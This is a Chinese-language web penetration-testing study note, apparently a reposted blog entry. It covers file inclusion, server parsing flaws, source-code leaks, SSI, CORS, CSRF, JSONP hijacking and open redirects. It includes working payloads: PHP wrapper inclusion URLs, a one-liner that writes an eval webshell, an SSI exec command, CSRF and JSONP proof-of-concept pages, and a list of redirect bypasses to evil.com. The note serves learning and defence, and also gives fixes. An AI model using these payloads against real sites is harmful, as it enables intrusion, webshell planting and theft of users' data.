学习笔记-Web Generic

Web Generic

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

大纲

相关文章

文件包含

文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在 PHP 中,提供了:include(),include_once(),require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。

大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则可能会引发文件包含漏洞。 攻击着会指定一个“意想不到”的文件让包含函数去执行,从而造成恶意操作。 根据不同的配置环境,文件包含漏洞分为如下两种情况:

  1. 本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击着更多的会包含一些固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。
  2. 远程文件包含漏洞:能够通过 url 地址对远程的文件进行包含,这意味着攻击者可以传入任意的代码,这种情况没啥好说的,准备挂彩

因此,在 web 应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数,如果非要这么做,也一定要做严格的白名单策略进行过滤。

相关文章

相关案例

rfi payload

lfi payload

几种利用方法

  • 常规利用

    Payload: http://www.test.com/test.php?file=upload/hourse.jpg&x=phpinfo()

  • 文件协议读取

    其前提是得知道网站应用的绝对路径(物理路径):

    Payload: http://www.test.com/test.php?file=file://D:/Server/htdocs/test/upload/hourse.jpg&x=phpinfo()

    结果和上面一样,只是地址栏链接不一样.

  • 压缩包文件读取

    依然需要知道压缩包文件的绝对路径

    Payload: http://www.test.com/test.php?file=zip://D:/Server/htdocs/test/upload/shell.zip%23shell.php&x=phpinfo())

  • phar:// 相对路径运行 PHP 文件

    当我们想要运行自己的 PHP 文件,该咋做呐?通过文件包含(include,require 这类函数),首先构造一个这样的文件,将 webshell.php 添加到压缩文件 .zip,然后将压缩包后缀名改为 .jpg 反正合法的文件后缀即可(一般的操作是这样的,当只能上传图片的时候),最后使用 phar:// 按照相对路径读取并执行文件.

    Payload:http://www.test.php?file=phar://upload/shell.jpg/shell.php?x=phpinfo()

  • 读取源码

    当我们没法儿上传文件,但是又想读取文件的源码来寻找别的漏洞从而进一步利用该怎么做呐?同样的利用 php://filter/ 协议可以实现,要注意的是,因为编码问题,一般我们会将读取的文件先 Base64 编码一下输出:

    Payload:http://www.test.com/test.php?file=php://filter/read=convert.base64-encode/resource=upload/shell.php

日志中毒攻击

log poisoning

相关文章

文件解析

相关文章

IIS

5.x/6.0 解析漏洞

IIS 6.0 解析利用方法有两种

  1. 目录解析

    /xx.asp/xx.jpg

  2. 文件解析

    wooyun.asp;.jpg

第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被 IIS 当作 asp 文件来解析并执行.

例如创建目录 wooyun.asp,那么 /wooyun.asp/1.jpg 将被当作 asp 文件来执行.假设黑阔可以控制上传文件夹路径,就可以不管你上传后你的图片改不改名都能拿 shell 了.

第二种,在 IIS6.0 下,分号后面的不被解析,也就是说 wooyun.asp;.jpg 会被服务器看成是wooyun.asp

还有 IIS6.0 默认的可执行文件除了 asp 还包含这三种

/wooyun.asa
/wooyun.cer
/wooyun.cdx

Nginx

IIS 7.0/IIS 7.5/Nginx <8.03 畸形解析漏洞

在默认 Fast-CGI 开启状况下,黑阔上传一个名字为 wooyun.jpg,内容为

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

然后访问 wooyun.jpg/.php,在这个目录下就会生成一句话木马 shell.php

Nginx <8.03 空字节代码执行漏洞

影响版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

Nginx 在图片中嵌入 PHP 代码然后通过访问 xxx.jpg%00.php 来执行其中的代码

Apache

Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断.

比如 wooyun.php.owf.rar ".owf"和".rar" 这两种后缀是 apache 不可识别解析,apache 就会把 wooyun.php.owf.rar 解析成 php.

如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个 wooyun.php.rar.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀

.htaccess

如果在 Apache 中 .htaccess 可被执行.且可被上传.那可以尝试在 .htaccess 中写入: <FilesMatch "wooyun.jpg"> SetHandler application/x-httpd-php </FilesMatch> 然后再上传 shell.jpg 的木马, 这样 shell.jpg 就可解析为 php 文件.

CVE-2017-15715 Apache HTTPD 换行解析漏洞

其 2.4.0~2.4.29 版本中存在一个解析漏洞,在解析 PHP 时,1.php\x0A 将被按照 PHP 后缀进行解析,导致绕过一些服务器的安全策略.

原理:在解析 PHP 时,1.php\x0A 将被按照 PHP 后缀进行解析.

用 hex 功能在 1.php 后面添加一个 \x0A

访问 http://10.10.10.131:8080/1.php ,成功解析

其他

在 windows 环境下,xx.jpg[空格]xx.jpg. 这两类文件都是不允许存在的,若这样命名,windows 会默认除去空格或点,黑客可以通过抓包,在文件名后加一个空格或者点绕过黑名单.若上传成功,空格和点都会被 windows 自动消除,这样也可以 getshell.

CGI 解析漏洞

/.php

文件上传

信息泄露

相关文章

相关工具

  • lijiejie/BBScan - 用于渗透测试前期,快速地对大量目标进行扫描,发现信息泄露等常见漏洞,找到可能的突破入口。
  • jerrychan807/WSPIH - 网站个人敏感信息文件扫描器
  • ring04h/weakfilescan - 动态多线程敏感信息泄露检测工具
  • 0xHJK/dumpall - 一款信息泄漏利用工具,适用于 .git/.svn 源代码泄漏和 .DS_Store 泄漏
    # pip安装
pip install dumpall
# 查看版本
dumpall --version
# 示例
dumpall -u http://example.com/.git/
dumpall -u http://example.com/.svn/
dumpall -u http://example.com/.DS_Store
dumpall -u http://example.com/
  • donot-wong/sensinfor - 一个自动扫描敏感文件的chrome扩展.

目录浏览

Tips

使用 wget 遍历下载所有文件

wget -r --no-pare target.com/dir

Fileread

源码泄露

GIT

简介

当在一个空目录执行 git init 时,Git 会创建一个 .git 目录. 这个目录包含所有的 Git 存储和操作的对象. 如果想备份或复制一个版本库,只需把这个目录拷贝至另一处就可以了.

  • /.git/config

相关案例

相关工具

  • lijiejie/GitHack - 一个 .git 泄露利用脚本,通过泄露的.git文件夹下的文件,重建还原工程源代码。
    python2 GitHack.py http://www.openssl.org/.git/
  • gakki429/Git_Extract - 提取远程 git 泄露或本地 git 的工具
    python2 git_extract.py http://example.com/.git/  # 一个存在 .git 泄露的网站
python2 git_extract.py example/.git/             # 一个本地的 .git 路径

SVN

  • /.svn/entries

相关案例

相关工具

  • kost/dvcs-ripper - SVN/GIT/HG 等版本控制系统的扫描工具
  • admintony/svnExploit - 一款 SVN 源代码利用工具,其完美支持 SVN<1.7 版本和 SVN>1.7 版本的 SVN 源代码泄露

bzr

相关工具

  • kost/dvcs-ripper - SVN/GIT/HG 等版本控制系统的扫描工具
    rip-bzr.pl -v -u http://www.example.com/.bzr/

DS_Store文件泄漏

简介

.DS_Store 文件 MAC 系统是用来存储这个文件夹的显示属性的:比如文件图标的摆放位置.如果用户删除以后的副作用就是这些信息的失去.

这些文件本来是给 Finder 使用的,但它们被设想作为一种更通用的有关显示设置的元数据存储,诸如图标位置和视图设置. 当你需要把代码上传的时候,安全正确的操作应该把 .DS_Store 文件删除才正确.

因为里面包含了一些目录信息,如果没有删除,攻击者通过 .DS_Store 可以知道这个目录里面所有文件名称,从而让攻击者掌握了更多的信息. 

相关案例

相关工具

SWP文件泄露

简介

swp 即 swap 文件,在编辑文件时产生的临时文件,它是隐藏文件,如果程序正常退出,临时文件自动删除,如果意外退出就会保留,文件名为 .filename.swp。

直接访问 .swp 文件,下载回来后删掉末尾的 .swp,获得源码文件

gedit备份文件

简介

linux 下,gedit 保存后当前目录会生成后缀为 “~” 的文件,然后通过浏览器访问这个文件就能得到原始文件的内容。

网站备份压缩文件

简介

该漏洞的成因主要有是管理员将备份文件放在到 web 服务器可以访问的目录下.

该漏洞往往会导致服务器整站源代码或者部分页面的源代码被下载,利用源代码中所包含的各类敏感信息,如服务器数据库连接信息,服务器配置信息等会因此而泄露,造成巨大的损失.

相关案例

相关工具

Tips

  • 有时候文件太大,想先确认一下文件结构和部分内容,这时可以使用 remotezip,直接列出远程 zip 文件的内容,而无需完全下载,甚至可以远程解压,仅下载部分内容
    pip3 install remotezip
remotezip -l "http://site/bigfile.zip"          # 列出远程zip文件的内容
remotezip "http://site/bigfile.zip" "file.txt"  # 从远程zip⽂件解压出file.txt

WEB-INF/web.xml信息泄露

简介

WEB-INF 是 Java 的 WEB 应用的安全目录.该目录原则上来说是客户端无法访问,只有服务端才可以可以访问.如果想在页面中直接访问其中的文件,必须通过 web.xml 文件对要访问的文件进行相应映射才能访问.

WEB-INF 主要包含一下文件或目录:

/WEB-INF/web.xml:Web 应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则;
/WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非 servlet class,他们不能包含在 .jar 文件中;
/WEB-INF/lib/:存放 web 应用需要的各种 JAR 文件,放置仅在这个应用中要求使用的 jar 文件 , 如数据库驱动 jar 文件;
/WEB-INF/src/:源码目录,按照包名结构放置各个 java 文件;
/WEB-INF/database.properties:数据库配置文件.

不过在一些特定的场合却会让攻击者能读取到其中的内容,从而造成源码泄露.

相关案例

idea文件夹泄露

相关工具

JS敏感信息泄露

相关文章

相关案例

相关工具

  • m4ll0k/SecretFinder - 通过正则在 JS 中发现敏感数据,如 apikeys、accesstoken、authorizations、jwt,..等等

    python3 SecretFinder.py -i https://example.com/ -e

    建议自行添加如下规则

    'access_key': r'[Aa](ccess|CCESS)_?[Kk](ey|EY)|[Aa](ccess|CCESS)_?[sS](ecret|ECRET)|[Aa](ccess|CCESS)_?(id|ID|Id)',
'secret_key': r'[Ss](ecret|ECRET)_?[Kk](ey|EY)',
'JWT': r'[= ]ey[A-Za-z0-9_-]*\.[A-Za-z0-9._-]*',
'ALL_JWT': r'[= ]ey[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*',

  • Threezh1/JSFinder - 通过在 js 文件中提取 URL,子域名

    python JSFinder.py -u http://www.xxx.com -d -ou url.txt -os subdomain.txt
python JSFinder.py -u http://www.xxx.com -d -c "session=xxx"    # -c 指定cookie来爬取页面

python JSFinder.py -f text.txt -j   # 批量指定URL/指定JS

Swagger_REST_API信息泄露

相关文章

相关工具

各类APIkey泄露

SOAP泄露

相关文章

相关案例

相关工具

不安全的输入

RCE

HTTP参数污染

相关文章

相关案例

CRLF_Injection

相关案例

相关工具

HOST_Injection

相关文章

SQL_inje

XSS

XXE

SSI

Server Side Includes 服务器端包含

简介

SSI 就是在 HTML 文件中,可以通过注释行调用的命令或指针,即允许通过在 HTML 页面注入脚本或远程执行任意代码。

相关文章

payload

xxx.shtml

<!--#exec cmd="id" -->

SSRF

SSTI

服务器端模板注入

表达式注入

相关文章

SpEL注入

WebSocket安全

相关文章

业务模板注入

pdf 生成、html 模板生成的功能点

通常是配合 lfi、ssrf 进行利用

相关案例

配置不当

代理配置不当

相关文章

相关案例

CORS

简介

CORS 跨域漏洞的本质是服务器配置不当,即 Access-Control-Allow-Origin 设置为 * 或是直接取自请求头 Origin 字段,Access-Control-Allow-Credentials 设置为 true。

CORS 与 CSRF 的区别

CORS 机制的目的是为了解决脚本的跨域资源请求问题,不是为了防止 CSRF。

CSRF 一般使用 form 表单提交请求,而浏览器是不会对 form 表单进行同源拦截的,因为这是无响应的请求,浏览器认为无响应请求是安全的。

脚本的跨域请求在同源策略的限制下,响应会被拦截,即阻止获取响应,但是请求还是发送到了后端服务器。

  • 相同点:都需要第三方网站;都需要借助 Ajax 的异步加载过程;一般都需要用户登录目标站点。
  • 不同点:一般 CORS 漏洞用于读取受害者的敏感信息,获取请求响应的内容;而 CSRF 则是诱使受害者点击提交表单来进行某些敏感操作,不用获取请求响应内容。

相关文章

相关案例

相关工具

相关靶场

CSRF

描述

跨站请求伪造(Cross-Site Request Forgery,CSRF)是一种使已登录用户在不知情的情况下执行某种动作的攻击。因为攻击者看不到伪造请求的响应结果,所以 CSRF 攻击主要用来执行动作,而非窃取用户数据。当受害者是一个普通用户时,CSRF 可以实现在其不知情的情况下转移用户资金、发送邮件等操作;但是如果受害者是一个具有管理员权限的用户时 CSRF 则可能威胁到整个 Web 系统的安全。

相关文章

相关工具

验证方法

  • GET

    <a href="http://www.example.com/api/setusername?username=uname">Click Me</a>

  • POST

    <form action="http://www.example.com/api/setusername" enctype="text/plain" method="POST">
<input name="username" type="hidden" value="uname" />
<input type="submit" value="Submit Request" />
</form>

  • JSON GET

    <script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://www.example.com/api/currentuser");
xhr.send();
</script>

  • JSON POST

    <script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://www.example.com/api/setrole");
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xhr.send('{"role":admin}');
</script>

Bypass 技巧

  • 尝试 fuzz token

    username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa

username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
username=dapos&password=123456&token=0
username=dapos&password=123456&token=
username=dapos&password=123456&

  • POST 转 GET

修复方案

  • Referer 校验,对 HTTP 请求的 Referer 校验,如果请求 Referer 的地址不在允许的列表中,则拦截请求。
  • Token 校验,服务端生成随机 token,并保存在本次会话 cookie 中,用户发起请求时附带 token 参数,服务端对该随机数进行校验。如果不正确则认为该请求为伪造请求拒绝该请求。
  • Formtoken 校验,Formtoken 校验本身也是 Token 校验,只是在本次表单请求有效。
  • 对于高安全性操作则可使用验证码、短信、密码等二次校验措施
  • 增删改请求使用 POST 请求

jsonp劫持

简介

JSONP(JSON with Padding)是 json 的一种 "使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据;它利用的是 script 标签的 src 属性不受同源策略影响的特性,使网页可以得到从其他来源动态产生的 json 数据,因此可以用来实现跨域读取数据。

JSONP 劫持实际上也算是 CSRF 的一种。当某网站使用 JSONP 的方式来跨域传递一些敏感信息时,攻击者可以构造恶意的 JSONP 调用页面,诱导被攻击者访问来达到截取用户敏感信息的目的。

JSON 实际应用的时候会有两种传输数据的方式:

  • xmlhttp 获取数据方式:

    {"username":"twosmi1e","password":"test123"}

    当在前端获取数据的时候,由于数据获取方和数据提供方属于同一个域下面,所以可以使用 xmlhttp 的方式来获取数据,然后再用 xmlhttp 获取到的数据传入自己的 js 逻辑如 eval。

  • script 获取数据方式:

    userinfo={"username":"twosmi1e","password":"test123"}

    如果传输的数据在两个不同的域,由于在 javascript 里无法跨域获取数据,所以一般采取 script 标签的方式获取数据,传入一些 callback 来获取最终的数据,如果缺乏有效地控制(对 referer 或者 token 的检查)就有可能造成敏感信息被劫持。

相关文章

相关案例

相关工具

场景模拟

<?php
//test.php
header('Content-type: application/json');
$callback = $_GET['callback'];
print $callback.'({"username" : "test","phone" : "13888888888"});';
?>

# 服务器上运行这个简易的服务
php -S 0.0.0.0:9999

举例,存在信息泄漏的 JSONP 接口 http://127.0.0.1:9999/test.php?callback=xxx ,攻击者构造 POC 后诱导用户访问 POC,然后就会调用这个接口获取到敏感数据,获取到的敏感数据被攻击者截获了。

<script>
    function xxx(data)
    {
      alert(data.username);
    }
</script>

<script src="http://127.0.0.1:9999/test.php?callback=xxx"></script>

保存为 html,诱导受害者访问.

SOME

同源方式执行

简介

SOME(Same Origin Method Execution),同源方式执行,不同于 XSS 盗取用户 cookie 为目的,直接劫持 cookie 经行操作,和 CSRF 攻击很类似,不同的是 CSRF 是构造一个请求,而 SOME 则希望脚本代码被执行。

相关文章

靶场

钓鱼欺骗

相关案例

URL跳转漏洞

Open Redirect

描述

由于 Web 站点有时需要根据不同的逻辑将用户引向到不同的页面,如典型的登录接口就经常需要在认证成功之后将用户引导到登录之前的页面,整个过程中如果实现不好就可能导致 URL 重定向问题,攻击者构造恶意跳转的链接,可以向用户发起钓鱼攻击。

相关文章

相关工具

字典

Bypass 技巧

  • Fuzz

    • /?ref=evil.com
    • /?ref=evil。com
    • /?ref=#evil.com
    • /?ref=#%20@evil.com
    • /?ref=/evil.com
    • /?ref=//evil.com
    • /?ref=\\evil.com
    • /?ref=\/\/evil.com/
    • /?ref=/\/evil.com/
    • /?ref=evil%E3%80%82com
    • /?ref=//evil%00.com
    • /?ref=https://evil.c℀.example.com
    • /?ref=/%0d/evil.com
    • /?ref=evil%00.com

  • URL 编码

    • /?ref=%2Fevil.com
    • /?ref=%2F%2Fevil.com
    • /?ref=https%3A%2F%2Fevil.com

  • CRLF

    • /?ref=%0D%0A/evil.com

  • 协议

    • /?ref=http://evil.com
    • /?ref=http:/\/\evil.com
    • /?ref=https:evil.com
    • /?ref=https://evil.com
    • /?ref=https:/evil.com
    • /?ref=https:/\evil.com

  • 白名单

    • /?ref=baidu.com
    • /?ref=baidu.com.evil.com
    • /?ref=baidu.comevil.com
    • /?ref=baidu.com@evil.com
    • /?ref=baidu.com%40evil.com
    • /?ref=baidu.com?evil.com
    • /?ref=baidu.com/°evil.com

  • 参数污染

    • /?ref=baidu.com&ref=evil.com

  • Right to Left Override

    • /?ref=%40%E2%80%AE@moc.live

通用修复方案

  • 使用白名单校验重定向的 url 地址
  • 给用户展示安全风险提示,并由用户再次确认是否跳转

二维码劫持

相关案例

点击劫持

  • click-jacking - 一个简单的讲解关于点击劫持的网站

相关案例

点击关注,共同学习!
安全狗的自我修养

github haidragon

https://github.com/haidragon

posted @ 2022-11-02 15:25  syscallwww  阅读(165)  评论(0编辑  收藏  举报